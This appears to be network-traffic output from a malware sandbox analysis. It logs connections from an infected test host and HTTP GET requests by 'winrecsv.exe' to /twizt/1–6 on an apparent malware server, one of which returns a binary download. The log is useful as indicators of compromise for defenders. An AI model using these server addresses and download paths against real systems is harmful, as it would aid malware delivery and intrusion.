Aug 15, 2022 18:31:31.304493904 CEST | 49763 | 80 | 192.168.2.7 | 185.215.113.66
Aug 15, 2022 18:31:31.304615021 CEST | 49763 | 80 | 192.168.2.7 | 185.215.113.66
Aug 15, 2022 18:31:33.790317059 CEST | 49764 | 40500 | 192.168.2.7 | 176.194.22.84
Aug 15, 2022 18:31:36.832381010 CEST | 49764 | 40500 | 192.168.2.7 | 176.194.22.84
Aug 15, 2022 18:31:38.258161068 CEST | 49765 | 80 | 192.168.2.7 | 185.215.113.84
Aug 15, 2022 18:31:38.315890074 CEST | 80 | 49765 | 185.215.113.84 | 192.168.2.7
Aug 15, 2022 18:31:38.316106081 CEST | 49765 | 80 | 192.168.2.7 | 185.215.113.84
Aug 15, 2022 18:31:38.323205948 CEST | 49765 | 80 | 192.168.2.7 | 185.215.113.84
Aug 15, 2022 18:31:38.378767014 CEST | 80 | 49765 | 185.215.113.84 | 192.168.2.7
Aug 15, 2022 18:31:38.378837109 CEST | 80 | 49765 | 185.215.113.84 | 192.168.2.7
Aug 15, 2022 18:31:38.378969908 CEST | 49765 | 80 | 192.168.2.7 | 185.215.113.84
Aug 15, 2022 18:31:38.826719999 CEST | 49763 | 80 | 192.168.2.7 | 185.215.113.66
Aug 15, 2022 18:31:38.883723974 CEST | 80 | 49763 | 185.215.113.66 | 192.168.2.7
Aug 15, 2022 18:31:38.883768082 CEST | 80 | 49763 | 185.215.113.66 | 192.168.2.7
Aug 15, 2022 18:31:38.883826971 CEST | 49763 | 80 | 192.168.2.7 | 185.215.113.66
Aug 15, 2022 18:31:39.898257017 CEST | 49763 | 80 | 192.168.2.7 | 185.215.113.66
Aug 15, 2022 18:31:39.954905033 CEST | 80 | 49763 | 185.215.113.66 | 192.168.2.7
Aug 15, 2022 18:31:39.955102921 CEST | 80 | 49763 | 185.215.113.66 | 192.168.2.7
Aug 15, 2022 18:31:39.955193996 CEST | 49763 | 80 | 192.168.2.7 | 185.215.113.66
Aug 15, 2022 18:31:40.983021021 CEST | 49763 | 80 | 192.168.2.7 | 185.215.113.66
Aug 15, 2022 18:31:41.042918921 CEST | 80 | 49763 | 185.215.113.66 | 192.168.2.7
Aug 15, 2022 18:31:41.046889067 CEST | 49763 | 80 | 192.168.2.7 | 185.215.113.66
Aug 15, 2022 18:31:42.926670074 CEST | 49764 | 40500 | 192.168.2.7 | 176.194.22.84
Aug 15, 2022 18:31:43.014853001 CEST | 49763 | 80 | 192.168.2.7 | 185.215.113.66
Aug 15, 2022 18:31:43.071795940 CEST | 80 | 49763 | 185.215.113.66 | 192.168.2.7
Aug 15, 2022 18:31:43.072801113 CEST | 49763 | 80 | 192.168.2.7 | 185.215.113.66
Aug 15, 2022 18:31:44.812818050 CEST | 49763 | 80 | 192.168.2.7 | 185.215.113.66
Aug 15, 2022 18:31:44.871459961 CEST | 80 | 49763 | 185.215.113.66 | 192.168.2.7
Aug 15, 2022 18:31:44.871617079 CEST | 49763 | 80 | 192.168.2.7 | 185.215.113.66
Aug 15, 2022 18:31:45.125787973 CEST | 49765 | 80 | 192.168.2.7 | 185.215.113.84
Aug 15, 2022 18:31:45.126938105 CEST | 49767 | 80 | 192.168.2.7 | 185.215.113.84
Aug 15, 2022 18:31:45.184633970 CEST | 80 | 49767 | 185.215.113.84 | 192.168.2.7
Aug 15, 2022 18:31:45.184873104 CEST | 49767 | 80 | 192.168.2.7 | 185.215.113.84
Aug 15, 2022 18:31:45.186141968 CEST | 80 | 49765 | 185.215.113.84 | 192.168.2.7
Aug 15, 2022 18:31:45.186245918 CEST | 49765 | 80 | 192.168.2.7 | 185.215.113.84
Aug 15, 2022 18:31:45.186839104 CEST | 49767 | 80 | 192.168.2.7 | 185.215.113.84
Aug 15, 2022 18:31:45.245997906 CEST | 80 | 49767 | 185.215.113.84 | 192.168.2.7
Aug 15, 2022 18:31:45.246023893 CEST | 80 | 49767 | 185.215.113.84 | 192.168.2.7
Aug 15, 2022 18:31:45.246228933 CEST | 49767 | 80 | 192.168.2.7 | 185.215.113.84
Aug 15, 2022 18:31:45.524461985 CEST | 49767 | 80 | 192.168.2.7 | 185.215.113.84
                                                                                Aug 15, 2022 18:31:48.190406084 CEST4976380192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:31:48.191395044 CEST4977880192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:31:48.253849030 CEST8049778185.215.113.66192.168.2.7
                                                                                Aug 15, 2022 18:31:48.254038095 CEST4977880192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:31:48.254514933 CEST4977880192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:31:48.254626989 CEST8049763185.215.113.66192.168.2.7
                                                                                Aug 15, 2022 18:31:48.254724979 CEST4976380192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:31:48.316457033 CEST8049778185.215.113.66192.168.2.7
                                                                                Aug 15, 2022 18:31:48.316487074 CEST8049778185.215.113.66192.168.2.7
                                                                                Aug 15, 2022 18:31:48.316560984 CEST4977880192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:31:49.321367979 CEST4977880192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:31:49.379134893 CEST8049778185.215.113.66192.168.2.7
                                                                                Aug 15, 2022 18:31:49.379162073 CEST8049778185.215.113.66192.168.2.7
                                                                                Aug 15, 2022 18:31:49.379271984 CEST4977880192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:31:50.398318052 CEST4977880192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:31:50.455782890 CEST8049778185.215.113.66192.168.2.7
                                                                                Aug 15, 2022 18:31:50.455815077 CEST8049778185.215.113.66192.168.2.7
                                                                                Aug 15, 2022 18:31:50.455980062 CEST4977880192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:31:51.491883039 CEST4977880192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:31:51.786901951 CEST4977880192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:31:51.831628084 CEST8049778185.215.113.66192.168.2.7
                                                                                Aug 15, 2022 18:31:51.831710100 CEST4977880192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:31:51.845146894 CEST8049778185.215.113.66192.168.2.7
                                                                                Aug 15, 2022 18:31:52.854788065 CEST4977880192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:31:52.912568092 CEST8049778185.215.113.66192.168.2.7
                                                                                Aug 15, 2022 18:31:52.912606001 CEST8049778185.215.113.66192.168.2.7
                                                                                Aug 15, 2022 18:31:52.912729025 CEST4977880192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:31:56.070290089 CEST4977880192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:31:56.071338892 CEST4978580192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:31:56.130171061 CEST8049785185.215.113.66192.168.2.7
                                                                                Aug 15, 2022 18:31:56.130592108 CEST8049778185.215.113.66192.168.2.7
                                                                                Aug 15, 2022 18:31:56.130697966 CEST4977880192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:31:56.131527901 CEST4978580192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:31:56.131560087 CEST4978580192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:31:56.187562943 CEST8049785185.215.113.66192.168.2.7
                                                                                Aug 15, 2022 18:31:56.187637091 CEST8049785185.215.113.66192.168.2.7
                                                                                Aug 15, 2022 18:31:56.187736034 CEST4978580192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:31:57.197448969 CEST4978580192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:31:57.253433943 CEST8049785185.215.113.66192.168.2.7
                                                                                Aug 15, 2022 18:31:57.253489017 CEST8049785185.215.113.66192.168.2.7
                                                                                Aug 15, 2022 18:31:57.253562927 CEST4978580192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:31:58.258836985 CEST4978580192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:31:58.314738989 CEST8049785185.215.113.66192.168.2.7
                                                                                Aug 15, 2022 18:31:58.314960003 CEST8049785185.215.113.66192.168.2.7
                                                                                Aug 15, 2022 18:31:58.315020084 CEST4978580192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:31:59.323095083 CEST4978580192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:31:59.382608891 CEST8049785185.215.113.66192.168.2.7
                                                                                Aug 15, 2022 18:31:59.382657051 CEST8049785185.215.113.66192.168.2.7
                                                                                Aug 15, 2022 18:31:59.382725954 CEST4978580192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:32:00.581275940 CEST4978580192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:32:00.640603065 CEST8049785185.215.113.66192.168.2.7
                                                                                Aug 15, 2022 18:32:00.640722036 CEST4978580192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:32:05.340064049 CEST4978580192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:32:05.341897011 CEST4978780192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:32:05.399940968 CEST8049785185.215.113.66192.168.2.7
                                                                                Aug 15, 2022 18:32:05.400258064 CEST4978580192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:32:05.405114889 CEST8049787185.215.113.66192.168.2.7
                                                                                Aug 15, 2022 18:32:05.405236959 CEST4978780192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:32:05.406146049 CEST4978780192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:32:05.462671041 CEST8049787185.215.113.66192.168.2.7
                                                                                Aug 15, 2022 18:32:05.462749958 CEST8049787185.215.113.66192.168.2.7
                                                                                Aug 15, 2022 18:32:05.462920904 CEST4978780192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:32:06.478008986 CEST4978780192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:32:06.550353050 CEST8049787185.215.113.66192.168.2.7
                                                                                Aug 15, 2022 18:32:06.550513029 CEST4978780192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:32:07.556500912 CEST4978780192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:32:07.613779068 CEST8049787185.215.113.66192.168.2.7
                                                                                Aug 15, 2022 18:32:07.613881111 CEST8049787185.215.113.66192.168.2.7
                                                                                Aug 15, 2022 18:32:07.613969088 CEST4978780192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:32:08.618907928 CEST4978780192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:32:08.677336931 CEST8049787185.215.113.66192.168.2.7
                                                                                Aug 15, 2022 18:32:08.677377939 CEST8049787185.215.113.66192.168.2.7
                                                                                Aug 15, 2022 18:32:08.679595947 CEST4978780192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:32:09.696106911 CEST4978780192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:32:09.757704020 CEST8049787185.215.113.66192.168.2.7
                                                                                Aug 15, 2022 18:32:09.757846117 CEST4978780192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:32:12.931016922 CEST4978780192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:32:12.932782888 CEST4979480192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:32:12.987638950 CEST8049787185.215.113.66192.168.2.7
                                                                                Aug 15, 2022 18:32:12.988606930 CEST4978780192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:32:12.990498066 CEST8049794185.215.113.66192.168.2.7
                                                                                Aug 15, 2022 18:32:12.990657091 CEST4979480192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:32:12.991106033 CEST4979480192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:32:13.048710108 CEST8049794185.215.113.66192.168.2.7
                                                                                Aug 15, 2022 18:32:13.048749924 CEST8049794185.215.113.66192.168.2.7
                                                                                Aug 15, 2022 18:32:13.048921108 CEST4979480192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:32:14.066327095 CEST4979480192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:32:14.123651981 CEST8049794185.215.113.66192.168.2.7
                                                                                Aug 15, 2022 18:32:14.123684883 CEST8049794185.215.113.66192.168.2.7
                                                                                Aug 15, 2022 18:32:14.123805046 CEST4979480192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:32:15.134737015 CEST4979480192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:32:15.194490910 CEST8049794185.215.113.66192.168.2.7
                                                                                Aug 15, 2022 18:32:15.194560051 CEST8049794185.215.113.66192.168.2.7
                                                                                Aug 15, 2022 18:32:15.194699049 CEST4979480192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:32:16.212922096 CEST4979480192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:32:16.270648003 CEST8049794185.215.113.66192.168.2.7
                                                                                Aug 15, 2022 18:32:16.270699978 CEST8049794185.215.113.66192.168.2.7
                                                                                Aug 15, 2022 18:32:16.270816088 CEST4979480192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:32:17.289227009 CEST4979480192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:32:17.350804090 CEST8049794185.215.113.66192.168.2.7
                                                                                Aug 15, 2022 18:32:17.350972891 CEST4979480192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:32:20.527383089 CEST4979480192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:32:20.528688908 CEST4979780192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:32:20.584839106 CEST8049794185.215.113.66192.168.2.7
                                                                                Aug 15, 2022 18:32:20.585040092 CEST8049797185.215.113.66192.168.2.7
                                                                                Aug 15, 2022 18:32:20.585127115 CEST4979480192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:32:20.585258961 CEST4979780192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:32:20.586002111 CEST4979780192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:32:20.643687963 CEST8049797185.215.113.66192.168.2.7
                                                                                Aug 15, 2022 18:32:20.643721104 CEST8049797185.215.113.66192.168.2.7
                                                                                Aug 15, 2022 18:32:20.643846989 CEST4979780192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:32:21.672964096 CEST4979780192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:32:21.729620934 CEST8049797185.215.113.66192.168.2.7
                                                                                Aug 15, 2022 18:32:21.729661942 CEST8049797185.215.113.66192.168.2.7
                                                                                Aug 15, 2022 18:32:21.729844093 CEST4979780192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:32:23.761060953 CEST4979780192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:32:23.817940950 CEST8049797185.215.113.66192.168.2.7
                                                                                Aug 15, 2022 18:32:23.817989111 CEST8049797185.215.113.66192.168.2.7
                                                                                Aug 15, 2022 18:32:23.818200111 CEST4979780192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:32:24.838673115 CEST4979780192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:32:24.898762941 CEST8049797185.215.113.66192.168.2.7
                                                                                Aug 15, 2022 18:32:24.902034044 CEST4979780192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:32:25.923537016 CEST4979780192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:32:25.980289936 CEST8049797185.215.113.66192.168.2.7
                                                                                Aug 15, 2022 18:32:25.980479956 CEST4979780192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:32:29.136281967 CEST4979780192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:32:29.137432098 CEST4979980192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:32:29.193053961 CEST8049797185.215.113.66192.168.2.7
                                                                                Aug 15, 2022 18:32:29.193190098 CEST4979780192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:32:29.193980932 CEST8049799185.215.113.66192.168.2.7
                                                                                Aug 15, 2022 18:32:29.194075108 CEST4979980192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:32:29.194683075 CEST4979980192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:32:29.250955105 CEST8049799185.215.113.66192.168.2.7
                                                                                Aug 15, 2022 18:32:29.251115084 CEST8049799185.215.113.66192.168.2.7
                                                                                Aug 15, 2022 18:32:29.251207113 CEST4979980192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:32:30.271567106 CEST4979980192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:32:30.333163977 CEST8049799185.215.113.66192.168.2.7
                                                                                Aug 15, 2022 18:32:30.333312988 CEST4979980192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:32:31.339890957 CEST4979980192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:32:31.397207975 CEST8049799185.215.113.66192.168.2.7
                                                                                Aug 15, 2022 18:32:31.397250891 CEST8049799185.215.113.66192.168.2.7
                                                                                Aug 15, 2022 18:32:31.397823095 CEST4979980192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:32:32.406368971 CEST4979980192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:32:32.463176012 CEST8049799185.215.113.66192.168.2.7
                                                                                Aug 15, 2022 18:32:32.463300943 CEST4979980192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:32:33.479639053 CEST4979980192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:32:33.536449909 CEST8049799185.215.113.66192.168.2.7
                                                                                Aug 15, 2022 18:32:33.537692070 CEST4979980192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:32:36.748977900 CEST4979980192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:32:36.750273943 CEST4980480192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:32:36.807207108 CEST8049799185.215.113.66192.168.2.7
                                                                                Aug 15, 2022 18:32:36.807295084 CEST4979980192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:32:36.808161974 CEST8049804185.215.113.66192.168.2.7
                                                                                Aug 15, 2022 18:32:36.809020042 CEST4980480192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:32:36.809062958 CEST4980480192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:32:36.865967989 CEST8049804185.215.113.66192.168.2.7
                                                                                Aug 15, 2022 18:32:36.866003036 CEST8049804185.215.113.66192.168.2.7
                                                                                Aug 15, 2022 18:32:36.866132975 CEST4980480192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:32:37.938834906 CEST4980480192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:32:38.000555992 CEST8049804185.215.113.66192.168.2.7
                                                                                Aug 15, 2022 18:32:38.000767946 CEST4980480192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:32:39.964112043 CEST4980480192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:32:40.021087885 CEST8049804185.215.113.66192.168.2.7
                                                                                Aug 15, 2022 18:32:40.021171093 CEST8049804185.215.113.66192.168.2.7
                                                                                Aug 15, 2022 18:32:40.021300077 CEST4980480192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:32:41.314265013 CEST4980480192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:32:41.375144005 CEST8049804185.215.113.66192.168.2.7
                                                                                Aug 15, 2022 18:32:41.375215054 CEST8049804185.215.113.66192.168.2.7
                                                                                Aug 15, 2022 18:32:41.375390053 CEST4980480192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:32:43.473820925 CEST4980480192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:32:43.869448900 CEST4980480192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:32:43.928890944 CEST8049804185.215.113.66192.168.2.7
                                                                                Aug 15, 2022 18:32:43.928993940 CEST4980480192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:32:47.120060921 CEST4980480192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:32:47.121169090 CEST4982180192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:32:47.176953077 CEST8049804185.215.113.66192.168.2.7
                                                                                Aug 15, 2022 18:32:47.179188013 CEST8049821185.215.113.66192.168.2.7
                                                                                Aug 15, 2022 18:32:47.179316044 CEST4980480192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:32:47.179369926 CEST4982180192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:32:47.189857006 CEST4982180192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:32:47.251374960 CEST8049821185.215.113.66192.168.2.7
                                                                                Aug 15, 2022 18:32:47.251492977 CEST8049821185.215.113.66192.168.2.7
                                                                                Aug 15, 2022 18:32:47.255687952 CEST4982180192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:32:48.278768063 CEST4982180192.168.2.7185.215.113.66
                                                                                Aug 15, 2022 18:32:48.336347103 CEST8049821185.215.113.66192.168.2.7
                                                                                Aug 15, 2022 18:32:48.336374044 CEST8049821185.215.113.66192.168.2.7
                                                                                Aug 15, 2022 18:32:48.336508989 CEST4982180192.168.2.7185.215.113.66
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Aug 15, 2022 18:31:33.805222988 CEST | 57861 | 40500 | 192.168.2.7 | 105.106.149.0
Aug 15, 2022 18:31:38.840588093 CEST | 57861 | 40500 | 192.168.2.7 | 89.236.217.87
                                                                                • 185.215.113.66
                                                                                • 185.215.113.84
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.7 | 49762 | 185.215.113.66 | 80 | C:\Windows\winrecsv.exe
Timestamp | kBytes transferred | Direction | Data
Aug 15, 2022 18:31:30.836591005 CEST | 852 | OUT | GET /twizt/1 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
Aug 15, 2022 18:31:30.893227100 CEST | 853 | IN | HTTP/1.1 200 OK
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:31:30 GMT
                                                                                Content-Type: application/octet-stream
                                                                                Content-Length: 6912
                                                                                Last-Modified: Wed, 03 Aug 2022 19:43:49 GMT
                                                                                Connection: keep-alive
                                                                                ETag: "62eacff5-1b00"
                                                                                Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.7 | 49763 | 185.215.113.66 | 80 | C:\Windows\winrecsv.exe
Timestamp | kBytes transferred | Direction | Data
Aug 15, 2022 18:31:31.247442961 CEST | 860 | OUT | GET /twizt/1 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
Aug 15, 2022 18:31:31.304255009 CEST | 862 | IN | HTTP/1.1 200 OK
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:31:31 GMT
                                                                                Content-Type: application/octet-stream
                                                                                Content-Length: 6912
                                                                                Last-Modified: Wed, 03 Aug 2022 19:43:49 GMT
                                                                                Connection: keep-alive
                                                                                ETag: "62eacff5-1b00"
                                                                                Accept-Ranges: bytes
Aug 15, 2022 18:31:38.826719999 CEST | 870 | OUT | GET /twizt/2 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
Aug 15, 2022 18:31:38.883768082 CEST | 871 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:31:38 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Aug 15, 2022 18:31:39.898257017 CEST | 871 | OUT | GET /twizt/3 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
Aug 15, 2022 18:31:39.955102921 CEST | 872 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:31:39 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                Aug 15, 2022 18:31:40.983021021 CEST | 872 | OUT | GET /twizt/4 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:31:41.042918921 CEST | 873 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:31:41 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                Aug 15, 2022 18:31:43.014853001 CEST | 873 | OUT | GET /twizt/5 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:31:43.071795940 CEST | 874 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:31:43 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                Aug 15, 2022 18:31:44.812818050 CEST | 874 | OUT | GET /twizt/6 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:31:44.871459961 CEST | 876 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:31:44 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
                                                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                10 | 192.168.2.7 | 49804 | 185.215.113.66 | 80 | C:\Windows\winrecsv.exe
                                                                                Timestamp | kBytes transferred | Direction | Data
                                                                                Aug 15, 2022 18:32:36.809062958 CEST | 7061 | OUT | GET /twizt/2 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
                                                                                Host: 185.215.113.66
                                                                                Aug 15, 2022 18:32:36.866003036 CEST | 7062 | IN | HTTP/1.1 404 Not Found
                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                Date: Mon, 15 Aug 2022 16:32:36 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 564
                                                                                Connection: keep-alive
